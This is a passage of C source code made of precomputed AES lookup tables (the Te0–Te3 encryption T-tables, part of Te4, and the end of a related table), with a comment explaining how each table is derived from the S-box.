0xFF605015, 0x15FF6050, 0x5015FF60, }, /* x=DA */ { 0x6E5918F4, 0xF46E5918, 0x18F46E59, 0x5918F46E, }, /* x=DB */ { 0x44663BC5, 0xC544663B, 0x3BC54466, 0x663BC544, }, /* x=DC */ { 0x4A6F36CE, 0xCE4A6F36, 0x36CE4A6F, 0x6F36CE4A, }, /* x=DD */ { 0x587421D3, 0xD3587421, 0x21D35874, 0x7421D358, }, /* x=DE */ { 0x567D2CD8, 0xD8567D2C, 0x2CD8567D, 0x7D2CD856, }, /* x=DF */ { 0x37A10C7A, 0x7A37A10C, 0x0C7A37A1, 0xA10C7A37, }, /* x=E0 */ { 0x39A80171, 0x7139A801, 0x017139A8, 0xA8017139, }, /* x=E1 */ { 0x2BB3166C, 0x6C2BB316, 0x166C2BB3, 0xB3166C2B, }, /* x=E2 */ { 0x25BA1B67, 0x6725BA1B, 0x1B6725BA, 0xBA1B6725, }, /* x=E3 */ { 0x0F853856, 0x560F8538, 0x38560F85, 0x8538560F, }, /* x=E4 */ { 0x018C355D, 0x5D018C35, 0x355D018C, 0x8C355D01, }, /* x=E5 */ { 0x13972240, 0x40139722, 0x22401397, 0x97224013, }, /* x=E6 */ { 0x1D9E2F4B, 0x4B1D9E2F, 0x2F4B1D9E, 0x9E2F4B1D, }, /* x=E7 */ { 0x47E96422, 0x2247E964, 0x642247E9, 0xE9642247, }, /* x=E8 */ { 0x49E06929, 0x2949E069, 0x692949E0, 0xE0692949, }, /* x=E9 */ { 0x5BFB7E34, 0x345BFB7E, 0x7E345BFB, 0xFB7E345B, }, /* x=EA */ { 0x55F2733F, 0x3F55F273, 0x733F55F2, 0xF2733F55, }, /* x=EB */ { 0x7FCD500E, 0x0E7FCD50, 0x500E7FCD, 0xCD500E7F, }, /* x=EC */ { 0x71C45D05, 0x0571C45D, 0x5D0571C4, 0xC45D0571, }, /* x=ED */ { 0x63DF4A18, 0x1863DF4A, 0x4A1863DF, 0xDF4A1863, }, /* x=EE */ { 0x6DD64713, 0x136DD647, 0x47136DD6, 0xD647136D, }, /* x=EF */ { 0xD731DCCA, 0xCAD731DC, 0xDCCAD731, 0x31DCCAD7, }, /* x=F0 */ { 0xD938D1C1, 0xC1D938D1, 0xD1C1D938, 0x38D1C1D9, }, /* x=F1 */ { 0xCB23C6DC, 0xDCCB23C6, 0xC6DCCB23, 0x23C6DCCB, }, /* x=F2 */ { 0xC52ACBD7, 0xD7C52ACB, 0xCBD7C52A, 0x2ACBD7C5, }, /* x=F3 */ { 0xEF15E8E6, 0xE6EF15E8, 0xE8E6EF15, 0x15E8E6EF, }, /* x=F4 */ { 0xE11CE5ED, 0xEDE11CE5, 0xE5EDE11C, 0x1CE5EDE1, }, /* x=F5 */ { 0xF307F2F0, 0xF0F307F2, 0xF2F0F307, 0x07F2F0F3, }, /* x=F6 */ { 0xFD0EFFFB, 0xFBFD0EFF, 0xFFFBFD0E, 0x0EFFFBFD, }, /* x=F7 */ { 0xA779B492, 0x92A779B4, 0xB492A779, 0x79B492A7, }, /* x=F8 */ { 0xA970B999, 0x99A970B9, 0xB999A970, 0x70B999A9, }, /* x=F9 */ { 0xBB6BAE84, 0x84BB6BAE, 0xAE84BB6B, 0x6BAE84BB, }, /* x=FA */ { 0xB562A38F, 0x8FB562A3, 0xA38FB562, 0x62A38FB5, }, /* x=FB */ { 0x9F5D80BE, 0xBE9F5D80, 0x80BE9F5D, 0x5D80BE9F, }, /* x=FC */ { 0x91548DB5, 0xB591548D, 0x8DB59154, 0x548DB591, }, /* x=FD */ { 0x834F9AA8, 0xA8834F9A, 0x9AA8834F, 0x4F9AA883, }, /* x=FE */ { 0x8D4697A3, 0xA38D4697, 0x97A38D46, 0x4697A38D, }, /* x=FF */ }; /* AES_Te0[x] = S [x].[02, 01, 01, 03]; AES_Te1[x] = S [x].[03, 02, 01, 01]; AES_Te2[x] = S [x].[01, 03, 02, 01]; AES_Te3[x] = S [x].[01, 01, 03, 02]; AES_Te4[x] = S [x].[01, 01, 01, 01]; AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; AES_Td4[x] = Si[x].[01, 01, 01, 01]; */ const uint32_t AES_Te0[256] = { 0xc66363a5U, 0xf87c7c84U, 0xee777799U, 0xf67b7b8dU, 0xfff2f20dU, 
0xd66b6bbdU, 0xde6f6fb1U, 0x91c5c554U, 0x60303050U, 0x02010103U, 0xce6767a9U, 0x562b2b7dU, 0xe7fefe19U, 0xb5d7d762U, 0x4dababe6U, 0xec76769aU, 0x8fcaca45U, 0x1f82829dU, 0x89c9c940U, 0xfa7d7d87U, 0xeffafa15U, 0xb25959ebU, 0x8e4747c9U, 0xfbf0f00bU, 0x41adadecU, 0xb3d4d467U, 0x5fa2a2fdU, 0x45afafeaU, 0x239c9cbfU, 0x53a4a4f7U, 0xe4727296U, 0x9bc0c05bU, 0x75b7b7c2U, 0xe1fdfd1cU, 0x3d9393aeU, 0x4c26266aU, 0x6c36365aU, 0x7e3f3f41U, 0xf5f7f702U, 0x83cccc4fU, 0x6834345cU, 0x51a5a5f4U, 0xd1e5e534U, 0xf9f1f108U, 0xe2717193U, 0xabd8d873U, 0x62313153U, 0x2a15153fU, 0x0804040cU, 0x95c7c752U, 0x46232365U, 0x9dc3c35eU, 0x30181828U, 0x379696a1U, 0x0a05050fU, 0x2f9a9ab5U, 0x0e070709U, 0x24121236U, 0x1b80809bU, 0xdfe2e23dU, 0xcdebeb26U, 0x4e272769U, 0x7fb2b2cdU, 0xea75759fU, 0x1209091bU, 0x1d83839eU, 0x582c2c74U, 0x341a1a2eU, 0x361b1b2dU, 0xdc6e6eb2U, 0xb45a5aeeU, 0x5ba0a0fbU, 0xa45252f6U, 0x763b3b4dU, 0xb7d6d661U, 0x7db3b3ceU, 0x5229297bU, 0xdde3e33eU, 0x5e2f2f71U, 0x13848497U, 0xa65353f5U, 0xb9d1d168U, 0x00000000U, 0xc1eded2cU, 0x40202060U, 0xe3fcfc1fU, 0x79b1b1c8U, 0xb65b5bedU, 0xd46a6abeU, 0x8dcbcb46U, 0x67bebed9U, 0x7239394bU, 0x944a4adeU, 0x984c4cd4U, 0xb05858e8U, 0x85cfcf4aU, 0xbbd0d06bU, 0xc5efef2aU, 0x4faaaae5U, 0xedfbfb16U, 0x864343c5U, 0x9a4d4dd7U, 0x66333355U, 0x11858594U, 0x8a4545cfU, 0xe9f9f910U, 0x04020206U, 0xfe7f7f81U, 0xa05050f0U, 0x783c3c44U, 0x259f9fbaU, 0x4ba8a8e3U, 0xa25151f3U, 0x5da3a3feU, 0x804040c0U, 0x058f8f8aU, 0x3f9292adU, 0x219d9dbcU, 0x70383848U, 0xf1f5f504U, 0x63bcbcdfU, 0x77b6b6c1U, 0xafdada75U, 0x42212163U, 0x20101030U, 0xe5ffff1aU, 0xfdf3f30eU, 0xbfd2d26dU, 0x81cdcd4cU, 0x180c0c14U, 0x26131335U, 0xc3ecec2fU, 0xbe5f5fe1U, 0x359797a2U, 0x884444ccU, 0x2e171739U, 0x93c4c457U, 0x55a7a7f2U, 0xfc7e7e82U, 0x7a3d3d47U, 0xc86464acU, 0xba5d5de7U, 0x3219192bU, 0xe6737395U, 0xc06060a0U, 0x19818198U, 0x9e4f4fd1U, 0xa3dcdc7fU, 0x44222266U, 0x542a2a7eU, 0x3b9090abU, 0x0b888883U, 0x8c4646caU, 0xc7eeee29U, 0x6bb8b8d3U, 0x2814143cU, 0xa7dede79U, 0xbc5e5ee2U, 0x160b0b1dU, 0xaddbdb76U, 0xdbe0e03bU, 0x64323256U, 0x743a3a4eU, 0x140a0a1eU, 0x924949dbU, 0x0c06060aU, 0x4824246cU, 0xb85c5ce4U, 0x9fc2c25dU, 0xbdd3d36eU, 0x43acacefU, 0xc46262a6U, 0x399191a8U, 0x319595a4U, 0xd3e4e437U, 0xf279798bU, 0xd5e7e732U, 0x8bc8c843U, 0x6e373759U, 0xda6d6db7U, 0x018d8d8cU, 0xb1d5d564U, 0x9c4e4ed2U, 0x49a9a9e0U, 0xd86c6cb4U, 0xac5656faU, 0xf3f4f407U, 0xcfeaea25U, 0xca6565afU, 0xf47a7a8eU, 0x47aeaee9U, 0x10080818U, 0x6fbabad5U, 0xf0787888U, 0x4a25256fU, 0x5c2e2e72U, 0x381c1c24U, 0x57a6a6f1U, 0x73b4b4c7U, 0x97c6c651U, 0xcbe8e823U, 0xa1dddd7cU, 0xe874749cU, 0x3e1f1f21U, 0x964b4bddU, 0x61bdbddcU, 0x0d8b8b86U, 0x0f8a8a85U, 0xe0707090U, 0x7c3e3e42U, 0x71b5b5c4U, 0xcc6666aaU, 0x904848d8U, 0x06030305U, 0xf7f6f601U, 0x1c0e0e12U, 0xc26161a3U, 0x6a35355fU, 0xae5757f9U, 0x69b9b9d0U, 0x17868691U, 0x99c1c158U, 0x3a1d1d27U, 0x279e9eb9U, 0xd9e1e138U, 0xebf8f813U, 0x2b9898b3U, 0x22111133U, 0xd26969bbU, 0xa9d9d970U, 0x078e8e89U, 0x339494a7U, 0x2d9b9bb6U, 0x3c1e1e22U, 0x15878792U, 0xc9e9e920U, 0x87cece49U, 0xaa5555ffU, 0x50282878U, 0xa5dfdf7aU, 0x038c8c8fU, 0x59a1a1f8U, 0x09898980U, 0x1a0d0d17U, 0x65bfbfdaU, 0xd7e6e631U, 0x844242c6U, 0xd06868b8U, 0x824141c3U, 0x299999b0U, 0x5a2d2d77U, 0x1e0f0f11U, 0x7bb0b0cbU, 0xa85454fcU, 0x6dbbbbd6U, 0x2c16163aU, }; const uint32_t AES_Te1[256] = { 0xa5c66363U, 0x84f87c7cU, 0x99ee7777U, 0x8df67b7bU, 0x0dfff2f2U, 0xbdd66b6bU, 0xb1de6f6fU, 0x5491c5c5U, 0x50603030U, 0x03020101U, 0xa9ce6767U, 0x7d562b2bU, 0x19e7fefeU, 0x62b5d7d7U, 0xe64dababU, 0x9aec7676U, 0x458fcacaU, 0x9d1f8282U, 0x4089c9c9U, 
0x87fa7d7dU, 0x15effafaU, 0xebb25959U, 0xc98e4747U, 0x0bfbf0f0U, 0xec41adadU, 0x67b3d4d4U, 0xfd5fa2a2U, 0xea45afafU, 0xbf239c9cU, 0xf753a4a4U, 0x96e47272U, 0x5b9bc0c0U, 0xc275b7b7U, 0x1ce1fdfdU, 0xae3d9393U, 0x6a4c2626U, 0x5a6c3636U, 0x417e3f3fU, 0x02f5f7f7U, 0x4f83ccccU, 0x5c683434U, 0xf451a5a5U, 0x34d1e5e5U, 0x08f9f1f1U, 0x93e27171U, 0x73abd8d8U, 0x53623131U, 0x3f2a1515U, 0x0c080404U, 0x5295c7c7U, 0x65462323U, 0x5e9dc3c3U, 0x28301818U, 0xa1379696U, 0x0f0a0505U, 0xb52f9a9aU, 0x090e0707U, 0x36241212U, 0x9b1b8080U, 0x3ddfe2e2U, 0x26cdebebU, 0x694e2727U, 0xcd7fb2b2U, 0x9fea7575U, 0x1b120909U, 0x9e1d8383U, 0x74582c2cU, 0x2e341a1aU, 0x2d361b1bU, 0xb2dc6e6eU, 0xeeb45a5aU, 0xfb5ba0a0U, 0xf6a45252U, 0x4d763b3bU, 0x61b7d6d6U, 0xce7db3b3U, 0x7b522929U, 0x3edde3e3U, 0x715e2f2fU, 0x97138484U, 0xf5a65353U, 0x68b9d1d1U, 0x00000000U, 0x2cc1ededU, 0x60402020U, 0x1fe3fcfcU, 0xc879b1b1U, 0xedb65b5bU, 0xbed46a6aU, 0x468dcbcbU, 0xd967bebeU, 0x4b723939U, 0xde944a4aU, 0xd4984c4cU, 0xe8b05858U, 0x4a85cfcfU, 0x6bbbd0d0U, 0x2ac5efefU, 0xe54faaaaU, 0x16edfbfbU, 0xc5864343U, 0xd79a4d4dU, 0x55663333U, 0x94118585U, 0xcf8a4545U, 0x10e9f9f9U, 0x06040202U, 0x81fe7f7fU, 0xf0a05050U, 0x44783c3cU, 0xba259f9fU, 0xe34ba8a8U, 0xf3a25151U, 0xfe5da3a3U, 0xc0804040U, 0x8a058f8fU, 0xad3f9292U, 0xbc219d9dU, 0x48703838U, 0x04f1f5f5U, 0xdf63bcbcU, 0xc177b6b6U, 0x75afdadaU, 0x63422121U, 0x30201010U, 0x1ae5ffffU, 0x0efdf3f3U, 0x6dbfd2d2U, 0x4c81cdcdU, 0x14180c0cU, 0x35261313U, 0x2fc3ececU, 0xe1be5f5fU, 0xa2359797U, 0xcc884444U, 0x392e1717U, 0x5793c4c4U, 0xf255a7a7U, 0x82fc7e7eU, 0x477a3d3dU, 0xacc86464U, 0xe7ba5d5dU, 0x2b321919U, 0x95e67373U, 0xa0c06060U, 0x98198181U, 0xd19e4f4fU, 0x7fa3dcdcU, 0x66442222U, 0x7e542a2aU, 0xab3b9090U, 0x830b8888U, 0xca8c4646U, 0x29c7eeeeU, 0xd36bb8b8U, 0x3c281414U, 0x79a7dedeU, 0xe2bc5e5eU, 0x1d160b0bU, 0x76addbdbU, 0x3bdbe0e0U, 0x56643232U, 0x4e743a3aU, 0x1e140a0aU, 0xdb924949U, 0x0a0c0606U, 0x6c482424U, 0xe4b85c5cU, 0x5d9fc2c2U, 0x6ebdd3d3U, 0xef43acacU, 0xa6c46262U, 0xa8399191U, 0xa4319595U, 0x37d3e4e4U, 0x8bf27979U, 0x32d5e7e7U, 0x438bc8c8U, 0x596e3737U, 0xb7da6d6dU, 0x8c018d8dU, 0x64b1d5d5U, 0xd29c4e4eU, 0xe049a9a9U, 0xb4d86c6cU, 0xfaac5656U, 0x07f3f4f4U, 0x25cfeaeaU, 0xafca6565U, 0x8ef47a7aU, 0xe947aeaeU, 0x18100808U, 0xd56fbabaU, 0x88f07878U, 0x6f4a2525U, 0x725c2e2eU, 0x24381c1cU, 0xf157a6a6U, 0xc773b4b4U, 0x5197c6c6U, 0x23cbe8e8U, 0x7ca1ddddU, 0x9ce87474U, 0x213e1f1fU, 0xdd964b4bU, 0xdc61bdbdU, 0x860d8b8bU, 0x850f8a8aU, 0x90e07070U, 0x427c3e3eU, 0xc471b5b5U, 0xaacc6666U, 0xd8904848U, 0x05060303U, 0x01f7f6f6U, 0x121c0e0eU, 0xa3c26161U, 0x5f6a3535U, 0xf9ae5757U, 0xd069b9b9U, 0x91178686U, 0x5899c1c1U, 0x273a1d1dU, 0xb9279e9eU, 0x38d9e1e1U, 0x13ebf8f8U, 0xb32b9898U, 0x33221111U, 0xbbd26969U, 0x70a9d9d9U, 0x89078e8eU, 0xa7339494U, 0xb62d9b9bU, 0x223c1e1eU, 0x92158787U, 0x20c9e9e9U, 0x4987ceceU, 0xffaa5555U, 0x78502828U, 0x7aa5dfdfU, 0x8f038c8cU, 0xf859a1a1U, 0x80098989U, 0x171a0d0dU, 0xda65bfbfU, 0x31d7e6e6U, 0xc6844242U, 0xb8d06868U, 0xc3824141U, 0xb0299999U, 0x775a2d2dU, 0x111e0f0fU, 0xcb7bb0b0U, 0xfca85454U, 0xd66dbbbbU, 0x3a2c1616U, }; const uint32_t AES_Te2[256] = { 0x63a5c663U, 0x7c84f87cU, 0x7799ee77U, 0x7b8df67bU, 0xf20dfff2U, 0x6bbdd66bU, 0x6fb1de6fU, 0xc55491c5U, 0x30506030U, 0x01030201U, 0x67a9ce67U, 0x2b7d562bU, 0xfe19e7feU, 0xd762b5d7U, 0xabe64dabU, 0x769aec76U, 0xca458fcaU, 0x829d1f82U, 0xc94089c9U, 0x7d87fa7dU, 0xfa15effaU, 0x59ebb259U, 0x47c98e47U, 0xf00bfbf0U, 0xadec41adU, 0xd467b3d4U, 0xa2fd5fa2U, 0xafea45afU, 0x9cbf239cU, 0xa4f753a4U, 0x7296e472U, 0xc05b9bc0U, 0xb7c275b7U, 
0xfd1ce1fdU, 0x93ae3d93U, 0x266a4c26U, 0x365a6c36U, 0x3f417e3fU, 0xf702f5f7U, 0xcc4f83ccU, 0x345c6834U, 0xa5f451a5U, 0xe534d1e5U, 0xf108f9f1U, 0x7193e271U, 0xd873abd8U, 0x31536231U, 0x153f2a15U, 0x040c0804U, 0xc75295c7U, 0x23654623U, 0xc35e9dc3U, 0x18283018U, 0x96a13796U, 0x050f0a05U, 0x9ab52f9aU, 0x07090e07U, 0x12362412U, 0x809b1b80U, 0xe23ddfe2U, 0xeb26cdebU, 0x27694e27U, 0xb2cd7fb2U, 0x759fea75U, 0x091b1209U, 0x839e1d83U, 0x2c74582cU, 0x1a2e341aU, 0x1b2d361bU, 0x6eb2dc6eU, 0x5aeeb45aU, 0xa0fb5ba0U, 0x52f6a452U, 0x3b4d763bU, 0xd661b7d6U, 0xb3ce7db3U, 0x297b5229U, 0xe33edde3U, 0x2f715e2fU, 0x84971384U, 0x53f5a653U, 0xd168b9d1U, 0x00000000U, 0xed2cc1edU, 0x20604020U, 0xfc1fe3fcU, 0xb1c879b1U, 0x5bedb65bU, 0x6abed46aU, 0xcb468dcbU, 0xbed967beU, 0x394b7239U, 0x4ade944aU, 0x4cd4984cU, 0x58e8b058U, 0xcf4a85cfU, 0xd06bbbd0U, 0xef2ac5efU, 0xaae54faaU, 0xfb16edfbU, 0x43c58643U, 0x4dd79a4dU, 0x33556633U, 0x85941185U, 0x45cf8a45U, 0xf910e9f9U, 0x02060402U, 0x7f81fe7fU, 0x50f0a050U, 0x3c44783cU, 0x9fba259fU, 0xa8e34ba8U, 0x51f3a251U, 0xa3fe5da3U, 0x40c08040U, 0x8f8a058fU, 0x92ad3f92U, 0x9dbc219dU, 0x38487038U, 0xf504f1f5U, 0xbcdf63bcU, 0xb6c177b6U, 0xda75afdaU, 0x21634221U, 0x10302010U, 0xff1ae5ffU, 0xf30efdf3U, 0xd26dbfd2U, 0xcd4c81cdU, 0x0c14180cU, 0x13352613U, 0xec2fc3ecU, 0x5fe1be5fU, 0x97a23597U, 0x44cc8844U, 0x17392e17U, 0xc45793c4U, 0xa7f255a7U, 0x7e82fc7eU, 0x3d477a3dU, 0x64acc864U, 0x5de7ba5dU, 0x192b3219U, 0x7395e673U, 0x60a0c060U, 0x81981981U, 0x4fd19e4fU, 0xdc7fa3dcU, 0x22664422U, 0x2a7e542aU, 0x90ab3b90U, 0x88830b88U, 0x46ca8c46U, 0xee29c7eeU, 0xb8d36bb8U, 0x143c2814U, 0xde79a7deU, 0x5ee2bc5eU, 0x0b1d160bU, 0xdb76addbU, 0xe03bdbe0U, 0x32566432U, 0x3a4e743aU, 0x0a1e140aU, 0x49db9249U, 0x060a0c06U, 0x246c4824U, 0x5ce4b85cU, 0xc25d9fc2U, 0xd36ebdd3U, 0xacef43acU, 0x62a6c462U, 0x91a83991U, 0x95a43195U, 0xe437d3e4U, 0x798bf279U, 0xe732d5e7U, 0xc8438bc8U, 0x37596e37U, 0x6db7da6dU, 0x8d8c018dU, 0xd564b1d5U, 0x4ed29c4eU, 0xa9e049a9U, 0x6cb4d86cU, 0x56faac56U, 0xf407f3f4U, 0xea25cfeaU, 0x65afca65U, 0x7a8ef47aU, 0xaee947aeU, 0x08181008U, 0xbad56fbaU, 0x7888f078U, 0x256f4a25U, 0x2e725c2eU, 0x1c24381cU, 0xa6f157a6U, 0xb4c773b4U, 0xc65197c6U, 0xe823cbe8U, 0xdd7ca1ddU, 0x749ce874U, 0x1f213e1fU, 0x4bdd964bU, 0xbddc61bdU, 0x8b860d8bU, 0x8a850f8aU, 0x7090e070U, 0x3e427c3eU, 0xb5c471b5U, 0x66aacc66U, 0x48d89048U, 0x03050603U, 0xf601f7f6U, 0x0e121c0eU, 0x61a3c261U, 0x355f6a35U, 0x57f9ae57U, 0xb9d069b9U, 0x86911786U, 0xc15899c1U, 0x1d273a1dU, 0x9eb9279eU, 0xe138d9e1U, 0xf813ebf8U, 0x98b32b98U, 0x11332211U, 0x69bbd269U, 0xd970a9d9U, 0x8e89078eU, 0x94a73394U, 0x9bb62d9bU, 0x1e223c1eU, 0x87921587U, 0xe920c9e9U, 0xce4987ceU, 0x55ffaa55U, 0x28785028U, 0xdf7aa5dfU, 0x8c8f038cU, 0xa1f859a1U, 0x89800989U, 0x0d171a0dU, 0xbfda65bfU, 0xe631d7e6U, 0x42c68442U, 0x68b8d068U, 0x41c38241U, 0x99b02999U, 0x2d775a2dU, 0x0f111e0fU, 0xb0cb7bb0U, 0x54fca854U, 0xbbd66dbbU, 0x163a2c16U, }; const uint32_t AES_Te3[256] = { 0x6363a5c6U, 0x7c7c84f8U, 0x777799eeU, 0x7b7b8df6U, 0xf2f20dffU, 0x6b6bbdd6U, 0x6f6fb1deU, 0xc5c55491U, 0x30305060U, 0x01010302U, 0x6767a9ceU, 0x2b2b7d56U, 0xfefe19e7U, 0xd7d762b5U, 0xababe64dU, 0x76769aecU, 0xcaca458fU, 0x82829d1fU, 0xc9c94089U, 0x7d7d87faU, 0xfafa15efU, 0x5959ebb2U, 0x4747c98eU, 0xf0f00bfbU, 0xadadec41U, 0xd4d467b3U, 0xa2a2fd5fU, 0xafafea45U, 0x9c9cbf23U, 0xa4a4f753U, 0x727296e4U, 0xc0c05b9bU, 0xb7b7c275U, 0xfdfd1ce1U, 0x9393ae3dU, 0x26266a4cU, 0x36365a6cU, 0x3f3f417eU, 0xf7f702f5U, 0xcccc4f83U, 0x34345c68U, 0xa5a5f451U, 0xe5e534d1U, 0xf1f108f9U, 0x717193e2U, 0xd8d873abU, 0x31315362U, 
0x15153f2aU, 0x04040c08U, 0xc7c75295U, 0x23236546U, 0xc3c35e9dU, 0x18182830U, 0x9696a137U, 0x05050f0aU, 0x9a9ab52fU, 0x0707090eU, 0x12123624U, 0x80809b1bU, 0xe2e23ddfU, 0xebeb26cdU, 0x2727694eU, 0xb2b2cd7fU, 0x75759feaU, 0x09091b12U, 0x83839e1dU, 0x2c2c7458U, 0x1a1a2e34U, 0x1b1b2d36U, 0x6e6eb2dcU, 0x5a5aeeb4U, 0xa0a0fb5bU, 0x5252f6a4U, 0x3b3b4d76U, 0xd6d661b7U, 0xb3b3ce7dU, 0x29297b52U, 0xe3e33eddU, 0x2f2f715eU, 0x84849713U, 0x5353f5a6U, 0xd1d168b9U, 0x00000000U, 0xeded2cc1U, 0x20206040U, 0xfcfc1fe3U, 0xb1b1c879U, 0x5b5bedb6U, 0x6a6abed4U, 0xcbcb468dU, 0xbebed967U, 0x39394b72U, 0x4a4ade94U, 0x4c4cd498U, 0x5858e8b0U, 0xcfcf4a85U, 0xd0d06bbbU, 0xefef2ac5U, 0xaaaae54fU, 0xfbfb16edU, 0x4343c586U, 0x4d4dd79aU, 0x33335566U, 0x85859411U, 0x4545cf8aU, 0xf9f910e9U, 0x02020604U, 0x7f7f81feU, 0x5050f0a0U, 0x3c3c4478U, 0x9f9fba25U, 0xa8a8e34bU, 0x5151f3a2U, 0xa3a3fe5dU, 0x4040c080U, 0x8f8f8a05U, 0x9292ad3fU, 0x9d9dbc21U, 0x38384870U, 0xf5f504f1U, 0xbcbcdf63U, 0xb6b6c177U, 0xdada75afU, 0x21216342U, 0x10103020U, 0xffff1ae5U, 0xf3f30efdU, 0xd2d26dbfU, 0xcdcd4c81U, 0x0c0c1418U, 0x13133526U, 0xecec2fc3U, 0x5f5fe1beU, 0x9797a235U, 0x4444cc88U, 0x1717392eU, 0xc4c45793U, 0xa7a7f255U, 0x7e7e82fcU, 0x3d3d477aU, 0x6464acc8U, 0x5d5de7baU, 0x19192b32U, 0x737395e6U, 0x6060a0c0U, 0x81819819U, 0x4f4fd19eU, 0xdcdc7fa3U, 0x22226644U, 0x2a2a7e54U, 0x9090ab3bU, 0x8888830bU, 0x4646ca8cU, 0xeeee29c7U, 0xb8b8d36bU, 0x14143c28U, 0xdede79a7U, 0x5e5ee2bcU, 0x0b0b1d16U, 0xdbdb76adU, 0xe0e03bdbU, 0x32325664U, 0x3a3a4e74U, 0x0a0a1e14U, 0x4949db92U, 0x06060a0cU, 0x24246c48U, 0x5c5ce4b8U, 0xc2c25d9fU, 0xd3d36ebdU, 0xacacef43U, 0x6262a6c4U, 0x9191a839U, 0x9595a431U, 0xe4e437d3U, 0x79798bf2U, 0xe7e732d5U, 0xc8c8438bU, 0x3737596eU, 0x6d6db7daU, 0x8d8d8c01U, 0xd5d564b1U, 0x4e4ed29cU, 0xa9a9e049U, 0x6c6cb4d8U, 0x5656faacU, 0xf4f407f3U, 0xeaea25cfU, 0x6565afcaU, 0x7a7a8ef4U, 0xaeaee947U, 0x08081810U, 0xbabad56fU, 0x787888f0U, 0x25256f4aU, 0x2e2e725cU, 0x1c1c2438U, 0xa6a6f157U, 0xb4b4c773U, 0xc6c65197U, 0xe8e823cbU, 0xdddd7ca1U, 0x74749ce8U, 0x1f1f213eU, 0x4b4bdd96U, 0xbdbddc61U, 0x8b8b860dU, 0x8a8a850fU, 0x707090e0U, 0x3e3e427cU, 0xb5b5c471U, 0x6666aaccU, 0x4848d890U, 0x03030506U, 0xf6f601f7U, 0x0e0e121cU, 0x6161a3c2U, 0x35355f6aU, 0x5757f9aeU, 0xb9b9d069U, 0x86869117U, 0xc1c15899U, 0x1d1d273aU, 0x9e9eb927U, 0xe1e138d9U, 0xf8f813ebU, 0x9898b32bU, 0x11113322U, 0x6969bbd2U, 0xd9d970a9U, 0x8e8e8907U, 0x9494a733U, 0x9b9bb62dU, 0x1e1e223cU, 0x87879215U, 0xe9e920c9U, 0xcece4987U, 0x5555ffaaU, 0x28287850U, 0xdfdf7aa5U, 0x8c8c8f03U, 0xa1a1f859U, 0x89898009U, 0x0d0d171aU, 0xbfbfda65U, 0xe6e631d7U, 0x4242c684U, 0x6868b8d0U, 0x4141c382U, 0x9999b029U, 0x2d2d775aU, 0x0f0f111eU, 0xb0b0cb7bU, 0x5454fca8U, 0xbbbbd66dU, 0x16163a2cU, }; const uint32_t AES_Te4[256] = { 0x63636363U, 0x7c7c7c7cU, 0x77777777U, 0x7b7b7b7bU, 0xf2f2f2f2U, 0x6b6b6b6bU, 0x6f6f6f6fU, 0xc5c5c5c5U, 0x30303030U, 0x01010101U, 0x67676767U, 0x2b2b2b2bU, 0xfefefefeU, 0xd7d7d7d7U, 0xababababU, 0x76767676U, 0xcacacacaU, 0x82828282U, 0xc9c9c9c9U, 0x7d7d7d7dU, 0xfafafafaU, 0x59595959U, 0x47474747U, 0xf0f0f0f0U, 0xadadadadU, 0xd4d4d4d4U, 0xa2a2a2a2U, 0xafafafafU, 0x9c9c9c9cU, 0xa4a4a4a4U, 0x72727272U, 0xc0c0c0c0U, 0xb7b7b7b7U, 0xfdfdfdfdU, 0x93939393U, 0x26262626U, 0x36363636U, 0x3f3f3f3fU, 0xf7f7f7f7U, 0xccccccccU, 0x34343434U, 0xa5a5a5a5U, 0xe5e5e5e5U, 0xf1f1f1f1U, 0x71717171U, 0xd8d8d8d8U, 0x31313131U, 0x15151515U, 0x04040404U, 0xc7c7c7c7U, 0x23232323U, 0xc3c3c3c3U, 0x18181818U, 0x96969696U, 0x05050505U, 0x9a9a9a9aU, 0x07070707U, 0x12121212U, 0x80808080U, 0xe2e2e2e2U, 0xebebebebU, 
0x27272727U, 0xb2b2b2b2U, 0x75757575U, 0x09090909U, 0x83838383U, 0x2c2c2c2cU, 0x1a1a1a1aU, 0x1b1b1b1bU, 0x6e6e6e6eU, 0x5a5a5a5aU, 0xa0a0a0a0U, 0x52525252U, 0x3b3b3b3bU, 0xd6d6d6d6U, 0xb3b3b3b3U, 0x29292929U, 0xe3e3e3e3U, 0x2f2f2f2fU, 0x84848484U, 0x53535353U, 0xd1d1d1d1U, 0x00000000U, 0xededededU, 0x20202020U, 0xfcfcfcfcU, 0xb1b1b1b1U, 0x5b5b5b5bU, 0x6a6a6a6aU, 0xcbcbcbcbU, 0xbebebebeU, 0x39393939U, 0x4a4a4a4aU, 0x4c4c4c4cU, 0x58585858U, 0xcfcfcfcfU, 0xd0d0d0d0U, 0xefefefefU, 0xaaaaaaaaU, 0xfbfbfbfbU, 0x43434343U, 0x4d4d4d4dU, 0x33333333U, 0x85858585U, 0x45454545U, 0xf9f9f9f9U, 0x02020202U, 0x7f7f7f7fU, 0x50505050U, 0x3c3c3c3cU, 0x9f9f9f9fU, 0xa8a8a8a8U, 0x51515151U, 0xa3a3a3a3U, 0x40404040U, 0x8f8f8f8fU, 0x92929292U, 0x9d9d9d9dU, 0x38383838U, 0xf5f5f5f5U, 0xbcbcbcbcU, 0xb6b6b6b6U, 0xdadadadaU, 0x21212121U, 0x10101010U, 0xffffffffU, 0xf3f3f3f3U, 0xd2d2d2d2U, 0xcdcdcdcdU, 0x0c0c0c0cU, 0x13131313U, 0xececececU, 0x5f5f5f5fU, 0x97979797U, 0x44444444U, 0x17171717U, 0xc4c4c4c4U, 0xa7a7a7a7U, 0x7e7e7e7eU, 0x3d3d3d3dU, 0x64646464U, 0x5d5d5d5dU, 0x19191919U, 0x73737373U, 0x60606060U, 0x81818181U, 0x4f4f4f4fU, 0xdcdcdcdcU, 0x22222222U, 0x2a2a2a2aU, 0x90909090U, 0x88888888U, 0x46464646U, 0xeeeeeeeeU, 0xb8b8b8b8U, 0x14141414U, 0xdedededeU, 0x5e5e5e5eU, 0x0b0b0b0bU, 0xdbdbdbdbU, 0xe0e0e0e0U, 0x32323232U, 0x3a3a3a3aU, 0x0a0a0a0aU, 0x49494949U, 0x06060606U, 0x24242424U, 0x5c5c5c5cU, 0xc2c2c2c2U, 0xd3d3d3d3U, 0xacacacacU, 0x62626262U, 0x91919191U, 0x95959595U, 0xe4e4e4e4U, 0x79797979U, 0xe7e7e7e7U, 0xc8c8c8c8U, 0x37373737U, 0x6d6d6d6dU, 0x8d8d8d8dU, 0xd5d5d5d5U, 0x4e4e4e4eU, 